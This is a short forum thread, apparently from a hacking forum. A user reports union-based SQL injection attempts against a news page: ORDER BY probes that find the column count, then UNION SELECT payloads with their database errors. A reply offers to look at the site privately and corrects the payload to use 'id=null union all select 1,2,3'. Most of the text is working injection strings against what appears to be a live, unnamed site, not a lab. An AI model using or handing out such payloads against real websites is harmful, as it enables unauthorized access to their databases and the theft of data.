I am practicing sql injection..

view_news.php?id=99 order by 1/* ---- no error

view_news.php?id=99 order by 2/* -----no error

view_news.php?id=99 order by 3/* -----no error

view_news.php?id=99 order by 4/* ----Unknown column '4' in 'order clause'

in the next step....

view_news.php?id=99 union all select 1/* ---The used SELECT statements have a different number of columns

view_news.php?id=99 union all select 1,2/* ---The used SELECT statements have a different number of columns

for 1,2,3,4,5 the same error...

i was stopped here since a few days plzz help me..
whats the matter.... can any one give the full details of the sql injectio...

Send me a pm with the site url, i'll have a look Smile

But considering
Code:
view_news.php?id=99 order by 3/*

is the highest without error, you should use select 1,2,3 /*

The problem is you shouldn't use
Code:
view_news.php?id=99 union all select 1,2,3/*

but
Code:
view_news.php?id=null union all select 1,2,3/*
